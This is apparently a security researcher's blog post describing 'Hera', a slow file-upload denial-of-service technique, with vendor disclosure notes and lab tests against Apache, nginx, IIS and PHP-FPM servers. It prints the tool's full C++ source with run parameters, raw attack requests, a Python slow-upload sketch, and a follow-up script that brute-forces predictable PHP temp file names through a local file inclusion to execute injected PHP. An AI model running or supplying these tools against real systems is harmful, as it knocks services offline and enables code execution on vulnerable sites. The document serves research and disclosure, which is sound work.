Denial of service – Evil is an art form

Introduction

This article was originally planned as one part of a larger project, with a presentation at the developer conference Öredev as the second part. However, the presentation at Öredev got cancelled (I have stage fright, so I don't really mind). I have instead decided to put more energy into the writing part of this little project, run more tests and try to present some more interesting results.

The idea started with "People are so creative at messing up servers these days. I wanna do that". And it ended in just that. People involved in some of the projects affected by this method have stated that they are either not vulnerable, or that this attack is not dangerous and should not be considered a vulnerability. Some of these statements will be covered further down in the text. The first idea was born several years ago when I wrote a script called "Tsunami" that simply bombed a server with file uploads. It was not very efficient, and I later abandoned the project as I could not get any interesting results out of it. The project was brought back to life not too long ago, and the very simple Tsunami script served as the base for the new Hera tool described below.

TL;DR

By uploading a large number of files to different server setups and never finishing the upload (utilizing slow attack methods), one can achieve one or several of the following effects:

  • Make the server unresponsive or have it respond with an internal server error
  • Fill the disk space, with different effects depending on the server setup
  • Use up RAM and crash the whole server

Basically, the effects come down to the huge number of temporary files saved to disk, the massive number of file handles opened, or the data being stored in RAM instead of on disk. Which of the results above you reach depends heavily on what type of server is used and how it is set up. The following setups were tested and will be covered in this article.

  • Windows Server with Apache
  • Windows Server with IIS 8
  • Linux server with Apache
  • Linux server with Nginx

It should be noted that some of these effects are similar or identical to those of other attacks such as Slowloris or Slowpost. The difference is that some servers handle file uploads differently, and sometimes rather badly. This of course has different effects depending on the setup.

So here’s the thing

The original Tsunami script simply flooded a server with file uploads. The end result on a very low-end machine was that the disk space eventually ran out. But it was so extremely inefficient that it was not worth continuing the project. So this time I needed to figure out a way to keep the server from removing the files. For my initial testing while developing the tool I used Apache with mod_php on Linux. Most settings were defaults, apart from a few modifications to make the server allow more requests and in some cases be more stable, which you will see later in this article when I list all the server results.

Now, the interesting part about uploading a file to a server is that the server has to store the data somewhere while the upload is being performed. Storing it in RAM is usually very inefficient since it can lead to memory exhaustion very quickly (although some servers still do this, as you will see later in the results). Some will store the data in temporary files, which seems more reasonable. In the case of mod_php, the data is uploaded and stored in a temporary file before it ever reaches your script/application. This was the first important thing I learned that made this slightly more exciting for me, because it means that as long as we have access to a PHP script on a server, any script, we can upload a file and have it stored temporarily. Of course, the file will be removed when the script has finished running, which was the problem with the Tsunami script (I made a script that ran very slowly to test this out; I didn't get very promising results either way).

The code responsible for the upload can be found here.
https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/rfc1867.c

The RFC in question for reference
https://www.ietf.org/rfc/rfc1867.txt

This part is interesting, since I needed to verify what the default setting for file uploads was. If the default was to not allow file uploads, this attack would be slightly less interesting.

/* If file_uploads=off, skip the file part */
if (!PG(file_uploads)) {
	skip_upload = 1;
} else if (upload_cnt <= 0) {
	skip_upload = 1;
	sapi_module.sapi_error(E_WARNING, "Maximum number of allowable file uploads has been exceeded");
}

Luckily, it is set to On by default.
This means that given any standard Apache installation with mod_php enabled, and at least one known PHP script reachable from the outside, this attack can be performed.

https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/main.c#L571

STD_PHP_INI_BOOLEAN("file_uploads",			"1",		PHP_INI_SYSTEM,		OnUpdateBool,			file_uploads,			php_core_globals,	core_globals)

https://github.com/php/php-src/blob/49412756df244d94a217853395d15e96cb60e18f/php.ini-development#L815

; Whether to allow HTTP file uploads.
; http://php.net/file-uploads
file_uploads = On

https://github.com/php/php-src/blob/49412756df244d94a217853395d15e96cb60e18f/php.ini-production#L815

; Whether to allow HTTP file uploads.
; http://php.net/file-uploads
file_uploads = On

As seen here, the file is uploaded to a temporary folder (normally /tmp on Linux) with a “php” prefix.
https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/rfc1867.c#L1021

if (!cancel_upload) {
	/* only bother to open temp file if we have data */
	blen = multipart_buffer_read(mbuff, buff, sizeof(buff), &end);
#if DEBUG_FILE_UPLOAD
	if (blen > 0) {
#else
	/* in non-debug mode we have no problem with 0-length files */
	{
#endif
		fd = php_open_temporary_fd_ex(PG(upload_tmp_dir), "php", &temp_filename, 1);
		upload_cnt--;
		if (fd == -1) {
			sapi_module.sapi_error(E_WARNING, "File upload error - unable to create a temporary file");
			cancel_upload = UPLOAD_ERROR_E;
		}
	}
}

Checking a more recent version of PHP yields the same result.
Below is the latest commit as of 2016-10-20.

https://github.com/php/php-src/blob/49412756df244d94a217853395d15e96cb60e18f/php.ini-production#L815

;;;;;;;;;;;;;;;;
; File Uploads ;
;;;;;;;;;;;;;;;;

; Whether to allow HTTP file uploads.
; http://php.net/file-uploads
file_uploads = On

So now that I have confirmed the default settings in PHP, I can start experimenting with uploading files. A simple Apache installation on a Debian machine with mod_php enabled and a test.php under /var/www/ should be enough. The test.php can theoretically be empty; this should work either way. Uploading a file is easy enough: create a simple form in an HTML file and submit it with a file selected. Nothing new there. The file gets saved in /tmp, and the information about it is passed on to test.php when the script is called. Whether test.php does something with the file is irrelevant; it will still be deleted from /tmp once the script has finished. But we want it to stay in the /tmp folder for as long as possible.
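For completeness, the kind of upload form used for the manual test looks something like this (the action path matches the test.php mentioned above):

```html
<form action="/test.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file">
    <input type="submit" value="Upload">
</form>
```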

After playing around in Burp for a while, I came to think about how Slowloris keeps a connection alive by sending headers very slowly, making the server prolong the timeout period for (sometimes) as long as the client wants. What if we could send a large file to the server, not finish it, and make the server think we intend to finish the upload by sending one byte at a time at very long intervals?

Sure enough, by setting a Content-Length header larger than the amount of data we actually upload, we can keep the file in /tmp for a long period, as long as we send some data once in a while (how often depends on the timeout settings). The original Content-Length of the request below was 16881, but I set it to 168810 to make the server wait for the rest of the data.

POST /test.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------1825653778175343117546207648
Content-Length: 168810

-----------------------------1825653778175343117546207648
Content-Disposition: form-data; name="file"; filename="data.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......

If we check /tmp, we can see that the file is indeed there:

jimmy@Enma /tmp $ ls /tmp/php*
/tmp/php5Ylw1J
jimmy@Enma /tmp $ cat /tmp/php5Ylw1J
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
.....
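The trick above can be sketched in a few lines of Python. This is a minimal illustration of the technique, not the Hera tool itself; the host, path and sizes in the usage comment are placeholders for a lab machine you own.

```python
import socket
import time

def build_slow_upload(path, host, file_data, inflate=10):
    """Build a multipart POST whose Content-Length claims more data
    than we actually send, so the server keeps the connection (and
    the temporary upload file) alive waiting for the rest."""
    boundary = "---------------------------1825653778175343117546207648"
    body = (
        "--" + boundary + "\r\n"
        'Content-Disposition: form-data; name="file"; filename="data.txt"\r\n'
        "Content-Type: text/plain\r\n\r\n"
        + file_data
    )
    headers = (
        "POST " + path + " HTTP/1.1\r\n"
        "Host: " + host + "\r\n"
        "Connection: close\r\n"
        "Content-Type: multipart/form-data; boundary=" + boundary + "\r\n"
        "Content-Length: " + str(len(body) * inflate) + "\r\n\r\n"
    )
    return (headers + body).encode()

# Usage sketch: send the partial upload, then trickle one byte at a time
# to keep the server waiting for the rest of the declared body:
#
# sock = socket.create_connection(("192.168.0.209", 80))
# sock.sendall(build_slow_upload("/test.php", "192.168.0.209", "a" * 16000))
# while True:
#     sock.sendall(b"a")
#     time.sleep(5)
```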

The default settings allow us to upload a total of 20 files in the same request, with a max POST size of 8 MB. This makes the attack more useful, as we can now open 20 file descriptors instead of just 1 as I had assumed before. In this first test I didn't send any data after the first chunk, so the files were removed when the request timed out. But all files sent were there for the duration of the request.
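The limits mentioned map to the following php.ini directives; the values shown are the stock defaults at the time of writing, so verify them against your own installation:

```ini
file_uploads = On         ; HTTP uploads allowed at all
max_file_uploads = 20     ; files accepted per request
upload_max_filesize = 2M  ; maximum size per file
post_max_size = 8M        ; maximum size of the whole POST body
```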

POST /test.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------1825653778175343117546207648
Content-Length: 168810

-----------------------------1825653778175343117546207648
Content-Disposition: form-data; name="file"; filename="data.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......

-----------------------------1825653778175343117546207648
Content-Disposition: form-data; name="file"; filename="data.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......

-----------------------------1825653778175343117546207648
Content-Disposition: form-data; name="file"; filename="data.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......

Again, all files are saved as separate files in /tmp

jimmy@Enma /tmp $ ls /tmp/php*
/tmp/phpmESJII  /tmp/phpQiDlOC  /tmp/phps2zxLa

Okay fine, so it works. Now what?

Well, now that I can persist a number of files on the target system for the duration of the request (which I can prolong via slow HTTP attack methods), I need a tool that can use this to attack the target system. This is how the Hera tool was born (don't put too much thought into the name; it made sense at first when a friend suggested it, but we can't remember why).

https://github.com/jra89/Hera

#define _GLIBCXX_USE_CXX11_ABI 0

#include <string.h>
#include <sstream>
#include <iostream>
#include <iomanip>
#include <thread>
#include <vector>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <csignal>
#include <ctime>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <arpa/inet.h>

using namespace std;

/*
~=Compile=~
g++ -std=c++11 -pthread main.cpp -o hera -lz

~=Run=~
./hera 192.168.0.209 80 5000 3 /test.php 0.03 20 0 0 20

~=Params=~
./hera host port threads connections path filesize files endfile gzip timeout 

~=Increase maximum file descriptors=~
vim /etc/security/limits.conf

* soft nofile 65000
* hard nofile 65000
root soft nofile 65000
root hard nofile 65000

~=Increase buffer size for larger attacks=~

*/

string getTime()
{
    auto t = time(nullptr);
    auto tm = *localtime(&t);
    ostringstream out;
    out << put_time(&tm, "%Y-%m-%d %H:%M:%S");
    return out.str();
}

void print(string msg, bool mood)
{
    string datetime = getTime();
    if(mood)
    {
        cout << "[+][" << datetime << "] " << msg << endl;
    }
    else
    {
        cout << "[-][" << datetime << "] " << msg << endl;
    }
}

void *get_in_addr(struct sockaddr *sa)
{
    if (sa->sa_family == AF_INET) {
        return &(((struct sockaddr_in*)sa)->sin_addr);
    }

    return &(((struct sockaddr_in6*)sa)->sin6_addr);
}

int doConnect(string *payload, string *host, string *port)
{
    int sockfd;
    struct addrinfo hints, *servinfo, *p = NULL;
    int rv, val;
    char s[INET6_ADDRSTRLEN];

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;


    if ((rv = getaddrinfo(host->c_str(), port->c_str(), &hints, &servinfo)) != 0) 
    {
        print("Unable to get host information", false);
    }


    while(!p)
    {
        for(p = servinfo; p != NULL; p = p->ai_next) 
        {
            if ((sockfd = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) 
            {
                print("Unable to create socket", false);
                continue;
            }

            if (connect(sockfd, p->ai_addr, p->ai_addrlen) == -1) 
            {
                close(sockfd);
                print("Unable to connect", false);
                continue;
            }

            //connected = true;
            break;
        }
    }

    int failures = 0;
    while(send(sockfd, payload->c_str(), payload->size(), MSG_NOSIGNAL) < 0)
    {
        if(++failures == 5)
        {
            close(sockfd);
            return -1;
        }
    }

    freeaddrinfo(servinfo);
    return sockfd;

}

void attacker(string *payload, string *host, string *port, int numConns, bool gzip, float timeout)
{
    int sockfd[numConns];
    fill_n(sockfd, numConns, 0);
    string data = "a\n";

    while(true)
    {
        for(int i = 0; i < numConns; ++i)
        {
            if(sockfd[i] <= 0)
            {
                sockfd[i] = doConnect(payload, host, port);
            }
        }
        
        for(int i = 0; i < numConns; ++i)
        {
            if(send(sockfd[i], data.c_str(), data.size(), MSG_NOSIGNAL) < 0)
    	    {
                close(sockfd[i]);
                sockfd[i] = doConnect(payload, host, port);
    	    }
        }

        usleep((useconds_t)(timeout * 1000000)); /* sleep() truncates sub-second timeouts to zero */
    }

     
}

string gen_random(int len) 
{
    char alphanum[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    int alphaLen = sizeof(alphanum) - 1;
    string str = "";

    for(int i = 0; i < len; ++i)
    {
        str += alphanum[rand() % alphaLen];
    }

    return str;
}

string buildPayload(string host, string path, float fileSize, int numFiles, bool endFile, bool gzip)
{
    ostringstream payload;
    ostringstream body;
    int extraContent = (endFile) ? 0 : 100000;

    //Build the body
    for(int i = 0; i < numFiles; ++i)
    {
	body << "-----------------------------424199281147285211419178285\r\n";
	body << "Content-Disposition: form-data; name=\"" << gen_random(10) << "\"; filename=\"" << gen_random(10) << ".txt\"\r\n";
	body << "Content-Type: text/plain\r\n\r\n";

    	for(int n = 0; n < (int)(fileSize*100000); ++n)
    	{
    	    body << "aaaaaaaaa\n";
    	}
    }

    //If we want to end the stream of files, add ending boundary
    if(endFile)
    {
        body << "-----------------------------424199281147285211419178285--";
    }
	
    //Build headers
    payload << "POST " << path.c_str() << " HTTP/1.1\r\n";
    payload << "Host: " << host.c_str() << "\r\n";
    payload << "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\r\n";
    payload << "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    payload << "Accept-Language: en-US,en;q=0.5\r\n";
    payload << "Accept-Encoding: gzip, deflate\r\n";
    payload << "Cache-Control: max-age=0\r\n";
    payload << "Connection: keep-alive\r\n";
    payload << "Content-Type: multipart/form-data; boundary=---------------------------424199281147285211419178285\r\n";
    payload << "Content-Length: " << body.str().size()+extraContent << "\r\n\r\n";
    payload << body.str() << "\r\n";
    
    return payload.str();
}

void help()
{
    string help = 
    "./hera host port threads connections path filesize files endfile gzip timeout\n\n"
    "host\t\tHost to attack\n"
    "port\t\tPort to connect to\n"
    "threads\t\tNumber of threads to start\n"
    "connections\tConnections per thread\n"
    "path\t\tPath to post data to\n"
    "filesize\tSize per file in MB\n"
    "files\t\tNumber of files per request (Min 1)\n"
    "endfile\t\tEnd the last file in the request (0/1)\n"
    "gzip\t\tEnable or disable gzip compression\n"
    "timeout\t\tTimeout between sending of continuation data (to keep connection alive)\n";

    cout << help;
}

int main(int argc, char *argv[])
{
    cout << "~=Hera 0.7=~\n\n";
    
    if(argc < 11)
    {
        help();
        exit(0);
    }

    string host = argv[1];
    string port = argv[2];
    int numThreads = atoi(argv[3]);
    int numConns = atoi(argv[4]);
    string path = argv[5];
    float fileSize = stof(argv[6]);
    int numFiles = atoi(argv[7]) > 0 ? atoi(argv[7]) : 2;
    bool endFile = atoi(argv[8]) == 1 ? true : false;
    bool gzip = atoi(argv[9]) == 1 ? true : false;
    float timeout = stof(argv[10]) < 0.1 ? 0.1 : stof(argv[10]);
    vector<thread> threadVector;

    print("Building payload", true);
    srand(time(0));
    string payload = buildPayload(host, path, fileSize, numFiles, endFile, gzip);
    //cout << payload << endl;
	
    print("Starting threads", true);
    for(int i = 0; i < numThreads; ++i)
    {
    	threadVector.push_back(thread(attacker, &payload, &host, &port, numConns, gzip, timeout));
        usleep(100000); /* sleep() takes whole seconds; 0.1 would truncate to 0 */
    }

    for(int i = 0; i < numThreads; ++i)
    {
    	threadVector[i].join();
    }
}

The version above is an older one; if you want to test the tool, I recommend cloning the repository from GitHub (linked above). The newest version has support for gzip. However, the gzip experiment did not produce the results I expected, so support for sending gzip-compressed data will be removed in the future. The tool compiles and works just fine as it is right now, though. As the idea is to open a ton of connections to a target server, it is essential to increase the number of file descriptors your system may use. This is usually set to something around 1024. The limit I have set in the example below can be anything, as long as you don't reach it, because then the test might fail.

/etc/security/limits.conf

* soft nofile 65000
* hard nofile 65000
root soft nofile 65000
root hard nofile 65000
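From the attacking side you can sanity-check the limit before starting. A small sketch using Python's standard library (POSIX systems only):

```python
import resource

# Current soft/hard caps on open file descriptors for this process.
# Every Hera connection costs one descriptor, so the soft limit bounds
# how many attack sockets you can hold open at once.
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
print("soft limit:", soft, "hard limit:", hard)
```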

This is also covered in the readme on github that I linked earlier.

Okay so how does this affect different servers?

Together with a colleague (Stefan Ivarsson), I ran and documented a number of tests to measure the effects this has on different systems. The effects differ quite a bit, and if you want to know whether this works on your own setup, the best way is to simply test it in a safe environment (like a test server that is separated from your production environment).

Setup 1
Operating system: Debian (Jessie, VirtualBox)
Web server: Apache (2.4.10)
Scripting module: mod_php (PHP 5.6.19-0+deb8u1)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
RAM: 2GB
CPU Core: 1
HDD: 8GB

So basically, what this meant for the test was that I could set my tool to send 20 files per request with a max size of 0.4 MB each, but to leave some margin for headers and such, I set it to 0.3 MB per file. There were two different ways I wanted to test this attack. The first was to send files as large as possible, which would fill up disk space and hopefully disrupt services as the machine ran out of space. The second was to send as many small files as possible and stress the server by opening too many file handles. As it turns out, both methods work well against different servers and setups, and either can prove fatal for the server depending on certain factors (setup, RAM, bandwidth, space, etc.).

During the test with the above setup, I set the Hera tool to attack using 2500 threads and 2 sockets per thread, with 20 files per request and each file set to 0.3 MB. That is 30 GB worth of data being sent to the server, so if it does not dispose of that information it will have to store it either on disk or in RAM, neither of which is large enough. What happened was rather expected, actually.
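The 30 GB figure is simple arithmetic over the attack parameters; a quick check using the numbers above:

```python
threads = 2500
sockets_per_thread = 2
files_per_request = 20
mb_per_file = 0.3

requests = threads * sockets_per_thread           # concurrent requests held open
total_mb = requests * files_per_request * mb_per_file
print(requests, "requests, roughly", round(total_mb / 1000), "GB of payload data")
```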

It should be noted that the default Apache installation allowed very few connections to be open, leading to a normal Slowloris effect. This is not what I was after, so I configured the server to allow more connections (each thread is about 1 MB with this setup, making it very inefficient, but don't worry, there are more test results further down). The server ran out of memory because of too many spawned Apache processes.

[Image: apacheoutofmemory]

When the RAM was increased, the disk space eventually ran out on the server.

[Image: nomorespace]

As expected, the number of files in the tmp folder exploded and kept the server's CPU usage up the whole time (until the disk space ran out, of course, at which point no more files could be created).

[Image: apachetmpfiles]

[Image: apachetmpfilescount]

During the attack the Apache server was unresponsive from the outside; when the HDD space ran out, it became responsive again.

[Image: apachenotreach]

An interesting effect appeared when I decided to halt the attack: the CPU went up to 100%, since the machine had to kill all the processes and remove all of the files. So I took the chance to immediately start the attack again to see what would happen. The CPU stayed at 100% as the machine kept trying to remove files and processes while I forced it to create new ones at the same time.

[Image: restartattack]

Setup 2
Operating system: Windows Server 2012 (VirtualBox)
Web server: Apache (WAMP)
Scripting module: mod_php (PHP 5)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
RAM: 4GB
CPU Core: 1
HDD: 25GB

This test was conducted in a similar manner to the first one. It resulted in Apache being killed because it consumed too much memory. The disk space also ran out after a while. The system became very unstable, and applications were killed one after another to preserve memory (Firefox and the Task Manager, for example). At first the same effect was reached as the connection pool ran out, but increasing the limit "fixed" that. The mpm_winnt_module was used in this first test; a more robust setup will be presented in a later test.

[Image: tempfileswindows]

As you can see in the image above, the tmp files are created and persist throughout the test as expected.

[Image: pluginservicekilled]

The system starts killing processes when the RAM starts running out, so we are still seeing effects similar to those of a normal Slowloris attack (that is, the Apache processes take up a lot of memory for every thread started; this is nothing new).

[Image: amountoffiles]

[Image: diskfullnewedited]

But we are still getting our desired effect of a huge number of files being uploaded and filling up the disk space, so that still works. After increasing the virtual machine's RAM to 8 GB, the Apache server did not get killed during the attack. The server was mostly unresponsive during the attack, and by setting the tool's timeout very low and the file size very small, the server's CPU load could be kept at around 90-100% constantly (since it was creating and removing thousands of files all the time). At one point the Apache process stopped accepting any connections, even after the attack had stopped, although this could not be reproduced easily, so I have yet to verify the cause. Another interesting effect was that memory usage went up to 2.5-3 GB and never came down again after the attack had finished (trying to create a dump of the Apache process memory after the attack heavily messed up the machine, so I gave up on that for now).

[Image: unresponsiveedit]

The picture above was taken when the process became unresponsive and stopped accepting connections. That cannot be seen in the picture itself, which instead demonstrates the memory usage several minutes after the attack had stopped.

Setup 3
Operating system: Debian (VirtualBox)
Web server: nginx
Scripting module: PHP-FPM (PHP 5)
Max allowed files per request: 20 (Default)
Max allowed post size: 1 MB (Default)
RAM: 4GB
CPU Core: 1
HDD: 25GB

In this test I tried the same tactic as before. One thing I immediately noticed was that with a lot of connections and few files per request, the max allowed connections limit was hit pretty fast (which is not surprising).

[Image: workernotenoughedit]

[Image: connectionresetedited]

But with a lot of small files per request, something more interesting happened instead. The server seemed to hit an open-file limit, which resulted in a 500 internal server error rather than a connection refused. Setting a small number of files but increasing the file size appeared to have the same effect, however, so this is probably the same effect as a Slowpost attack.

[Image: nginxtoomanyfiles-edited]

[Image: nginxinternalservererror]

Changing worker_connections in /etc/nginx/nginx.conf to a higher value mostly fixed the first problem with opening a lot of Slowloris-like connections (small number of files only). But increasing the number of files to the maximum (20) per request quickly downed the server again, showing only an internal server error message. Changing the size of the data sent also had this effect, of course.
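For reference, the knobs involved on the nginx side look roughly like this; the values are illustrative, not hardening advice:

```nginx
events {
    # Stock builds default to a few hundred; each unfinished
    # upload holds one of these for its whole lifetime.
    worker_connections 10240;
}

http {
    # Default 1 MB cap on the request body.
    client_max_body_size 1m;

    # Request bodies are buffered to temp files here before
    # PHP-FPM ever sees them.
    client_body_temp_path /var/lib/nginx/body;
}
```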

One thing I noticed is that nginx does not hand the data over to PHP until the request has finished transmitting. This does not stop the creation of files, since nginx needs to create temporary files as well, but it does prevent the large number of files from being created, as nginx will only create one file per request instead of up to 20 like mod_php.

Setup 4
Operating system: Windows Server 2012 (VirtualBox)
Web server: IIS 8
Scripting module: ASP.NET
RAM: 4GB
CPU Core: 1
HDD: 25GB

This test ended very similarly to the nginx one. The server appeared to save the data in a single temporary file, and did not seem to have much of a problem with the number of connections. In the end, when maxing out the attack from the attacking machine, the web server became unresponsive about 8 out of 10 times. This was most likely a Slowloris/Slowpost type of effect rather than a result of a lot of files being created. More tests could be made on this setup to further investigate ways of bringing the server down, but because of the relatively poor result (compared to the other setups) I decided to leave it at that for now. The server can be stressed, no doubt about that, but not in the way I intended for this experiment.

Setup 5
Operating system: Debian (Amazon EC2, m4.xlarge)
Web server: Apache
Scripting module: PHP-FPM (PHP 7)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
RAM: 16GB
CPU Core: 1
HDD: 30GB

This test was special and was the last big test I wanted to make. The goal was to try the attack method on a larger, more realistic setup in the cloud. To do this I took the help of Werner Kwiatkowski over at http://rustytub.com, who (in exchange for candy, herring and beverages) helped me set up a realistic and stable server that could take a punch.

[Image: siteoffline]

The first problem I had as the attacker was that the server would only create a single temporary file per request, instead of up to 20 as I was expecting. The second "problem" was that the server became unresponsive in a Slowloris/Slowpost kind of manner instead of being affected by my many uploaded files. This was because Werner had set it up so that the server would rather become unresponsive than crash catastrophically. That is of course preferable, and it defeated my tool in a way. So, to get my desired effect I actually had to raise the server's max allowed connections considerably so that I could see the effects of all the files being created. This differs from my initial idea of only testing near-default setups, but I felt it was important to have some more realistic samples as well. And yes, I used hackme.biz for the final test.

[Image: filecountedited]

The number of files shown above seemed to be the maximum I could reach. However, after the limit was reached, something very interesting happened: the server appeared to store the files that could not be written to temporary files in memory instead. This made RAM usage go completely out of control very quickly. It took a while for the attack to actually use up all of that RAM, but after about 30 minutes it had finally managed to fill it all up.

[Image: extremeram]

The image above was taken about a minute before the server stopped responding and crashed because of memory exhaustion.

[Image: ec2status]

Logging into the AWS account and checking the EC2 instances makes it clearer that the node has crashed. Now, of course, this could still mean that what we are seeing are the effects of a Slowloris attack, where the spawned processes are the ones using up all the memory. So to test that, I ran the same test with a Slowloris attack tool against this setup. The result was actually not that impressive, even when I tried using more connections than with the Hera tool.

[Image: notsoextremeram]

As you can see, the memory usage for the same number of threads/connections is not even close. That is because this particular setup is not vulnerable to the normal Slowloris attack, nor is it vulnerable to Slowpost (I did not try Slowread and other slow attacks).

[Image: php-fpm-files-ram]

This time dumping memory was a lot easier, so I could check whether the data was still stored in memory even while the attack was idle (as in, not currently transmitting a lot of data, simply waiting for the timeout to occur). The data from the payload could be found in the process memory, which explains why the RAM usage went out of control like it did. I have not investigated this any further, though.

So, in summary

I would like to think that this method could be used for some pretty bad stuff. It is not an entirely new attack method, but rather a new way of performing slow attacks against servers that handle file uploads badly. Not all of the setups were vulnerable to this method, but most of them were either vulnerable to it or to other slow attacks that became apparent during the testing (for example, Slowpost on the nginx setups).

This method can be used in other ways than crashing servers. It can be used in an attack to guess temporary file names when you only have a file inclusion vulnerability at your disposal. You can read the start of that project here.

When I started playing around with this method I contacted Apache, PHP and Red Hat to hear what they had to say about it. Apache said it does not directly affect them (which is true, since in the case of mod_php it is in the hands of the PHP team). PHP said that it was not a security issue and that file uploads are not turned on by default. If you have read this article, you will see that this is simply not true, and I have asked them to clarify what they mean by that, without getting an answer. Red Hat were extremely helpful and even set up a test machine for the tool where they could see the effects. However, they did not deem this a vulnerability and closed the case. I still think it is an interesting method, and I also feel it should be okay for me to post this now without regretting it later for breaking any responsible disclosure policies.

Thanks for reading!

Posted in Hacking, Security

Local file inclusion with tmp files

A thing I noticed while writing the Hera tool and doing all the tests is that some server setups did not have very good randomness in their temporary file names. This opens up some interesting opportunities if you happen to have found a local file inclusion vulnerability in an application.

Imagine the following, not very good, code in an application:

<?php include($_GET['file']); ?>

It looks bad, and I promise it is not that unusual; we come across it from time to time during our reviews.

And here are some temporary files that were created in the WAMP test that I did while writing the article for Hera. Notice that the random string after the “php” prefix is rather short and should be easy to predict or brute force.

[Image: deterministicfiles]
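As a rough illustration, the candidate name space can be enumerated in Python. The “php” prefix plus up to four uppercase hex digits is an assumption based on how GetTempFileName names files, matching the names seen in the listing above:

```python
def candidate_tmp_names(prefix="php", limit=0x100):
    """Yield plausible Windows temp file names to try including.
    GetTempFileName appends up to four uppercase hex digits to the
    prefix, so the whole space is at most 0xFFFF names."""
    for n in range(1, limit):
        yield "{}{:X}.tmp".format(prefix, n)

# First few candidates: php1.tmp, php2.tmp, ...
names = list(candidate_tmp_names(limit=8))
```

A brute-forcer would simply feed these candidates into the inclusion loop shown further down.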

So to test this I modified Hera a bit, or more specifically the payload builder of the tool to include a piece of PHP code at the end of every file uploaded to a server.

.....
    //Build the body 
    for(int i = 0; i < numFiles; ++i)
    {
        body << "-----------------------------424199281147285211419178285\r\n";
        body << "Content-Disposition: form-data; name=\"" << gen_random(10) << "\"; filename=\"" << gen_random(10) << ".txt\"\r\n";
        body << "Content-Type: text/plain\r\n\r\n";

        for(int n = 0; n < (int)(fileSize*100000); ++n)
        {
            body << "aaaaaaaaa\n";
        }

        body << "<?='ThisShouldNotExist';?>\n";
    }
.....

Notice the “ThisShouldNotExist”. If the code gets executed, that text will show up on the vulnerable page. Now we need another tool that constantly tries to include a set of temporary files that we think will show up eventually. I wrote a simple Python script for this.

from urllib import request, parse

def main():

    target = 'http://10.11.12.69/test.php?file=../tmp/'
    tmpFiles = ['php1.tmp', 'php1A00.tmp', 'php1A01.tmp', 'php1A1A.tmp', 'php1A1B.tmp', 'php1A.tmp', 'php1B.tmp']

    while True:
        for tmp in tmpFiles:
            if 'ThisShouldNotExist' in doRequest(target + tmp):
                print("Code executed")
                exit()


def doRequest(target):
    # Retry until a response is received; any exception (connection
    # reset, HTTP error) simply triggers another attempt.
    while True:
        try:
            req = request.Request(target)
            resp = request.urlopen(req)
            return resp.read().decode('UTF-8')
        except:
            pass

if __name__ == '__main__':
    main()

And then we run the two tools, wait a little while and see the result. Notice how small the files are, to make the process quicker; we are not interested in sending a lot of data to the server this time. Of course this could all be optimized greatly, and right now the Hera tool will upload the set of files like normal. A more optimal solution would be to have Hera upload a set of files, then restart the attack so that a new set of tmp files is created on the server, thus raising the chance that one of our guessed tmp file names gets used.
